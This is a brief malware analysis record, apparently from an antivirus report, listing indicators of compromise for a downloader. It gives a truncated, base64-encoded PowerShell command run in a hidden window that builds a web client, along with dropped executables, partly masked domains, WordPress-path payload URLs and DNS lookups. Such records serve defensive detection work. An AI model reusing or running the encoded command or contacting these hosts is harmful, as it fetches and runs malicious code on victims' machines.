Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAEEAUQBBAEMARAA9ACgAJwBTAEQAUQBEACcAKwAnAEEAQQAnACsAJwBCAGMAJwApADsAJAByAEEAQQBVAF8AQQBBAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\1191785.cvr
- %HOMEPATH%\355.exe
- 'da####talleys.com':80
- 'pe###sports.com':80
- 'ne####mixnews.com':80
- http://da####talleys.com/wp-includes/rK7SE/
- http://ne####mixnews.com/wp-admin/2QwjJ/
- DNS ASK da####talleys.com
- DNS ASK pe####liotar.com
- DNS ASK pe###sports.com
- DNS ASK ne####mixnews.com
- DNS ASK fi###rbling.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAEEAUQBBAEMARAA9ACgAJwBTAEQAUQBEACcAKwAnAEEAQQAnACsAJwBCAGMAJwApADsAJAByAEEAQQBVAF8AQQBBAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...' (with hidden window)